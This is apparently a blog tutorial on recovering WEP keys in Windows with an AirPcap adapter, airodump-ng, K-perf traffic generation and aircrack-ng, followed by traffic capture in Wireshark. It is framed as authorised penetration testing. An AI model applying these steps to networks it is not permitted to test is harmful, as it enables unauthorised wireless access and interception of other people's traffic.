This guide demonstrates how to crack WEP in Windows using the AirPcap Wireless Capture Adapter.
To do this, you’ll need the useful AirPcap USB Wireless Capture Adapter from CACE Technologies. It’s pretty cheap when compared to some of the other Windows hardware solutions, and you’ll be supporting the makers of Wireshark!
I adore Linux and the entire Open Source movement, but it’s important to recognise that many people out there are locked into Windows; and learning an entirely new OS to perform security testing isn’t cost-effective for their company.
How is WEP cracked?
To crack WEP, you need to exploit a weakness in its implementation, and collect lots of Initialisation Vectors (IVs). In normal WLAN traffic, it would take quite a while to pickup enough IVs – approximately 1 million – so we need to generate our own traffic. There’s two ways we could do this:
- Generate your own traffic using iperf.
- Use packet injection using aireplay.
At present, the AirPcap Drivers do not support packet injection in Windows. Fortunately, the makers of AirPcap, CACE Technologies, have said packet injection will be included soon.
What will you need?
- An AirPcap Wireless Capture adapter. This is a great little tool for 802.11 sniffing in Windows. You can even run Kismet with it!
- The Aircrack-ng for AirPcap release by CACE Technologies.
- Your own Wireless Access Point, configured with WEP.
- 3 computers, at least 1 of which should have a Wireless LAN Adapter.
- Enough traffic to generate over 1 million IVs. For this demonstration, we’ll use a Windows release of iperf, called K-perf, to generate lots of traffic.
Let’s get cracking
This guide assumes that you are performing this on a WLAN you have permission to use.
OK let’s do it…
Set up Aircrack
Plug in your AirPcap.
Extract the contents of the aircrack-ng release to C:\aircrack (or wherever, I’m just doing this for tidiness).
Open up the c:\aircrack\bin\ directory and double-click the airodump-ng.exe (this is a specially built release tailored for AirPcap).
Configure it as per your settings [Screenshot: Configuring Airodump-ng]
Generate some traffic
Install K-perf, then run J-perf â€” the Java front-end â€” on the two machines connected to the AP. At least one should be connected via Wireless. Set one up as a server, and the other as a client. Remember, we’re just doing this to generate enough traffic on our demo WLAN.
On the Server, choose the ‘Server’ option, then click Run. [Screenshot: Server, Configure K-perf using the Java front-end, J-perf.]
On the Client, type in the Server’s IP address, configure the time iperf should run to 1200, and click Run. [Screenshot: Client, Configure K-perf]
Capture and Crack
Go back to your AirPcap machine and watch the IV frames come in. [Screenshot: Airodump-ng capturing WEP IVs]
When you’ve hit over 1,000,000 frames, open up aircrack-ng_GUI.exe in the c:\aircrack\bin\ directory.
Click the Aircrack-ng tab, and locate your crackme.iv file.
Click launch and wait for the cracker to find your WEP key. [Screenshot: Airocrack-ng cracking WEP]
If aircrack cannot find your WEP key, you may not have enough IVs. To get more IVs, start up airodump-ng.exe again, and when asked the Output filename prefix, give the same name as you did previously. Airodump-ng will then append packets to the original dump.
As this is a simulation, now that you have your WEP key, you can continue your penetration testing by using AirPcap with Wireshark to capture all the traffic flowing over your WPA or WEP-enabled WLAN.
As one of the aims of my blog is to help people, if you have friends/neighbours/co-workers whose WLANs are WEP enabled, you could demonstrate how easy it is to crack WEP, and then help them set up a properly-implemented WPA/WPA2 WLAN
Did this help you at all? Any questions? Feel free to leave me a comment below!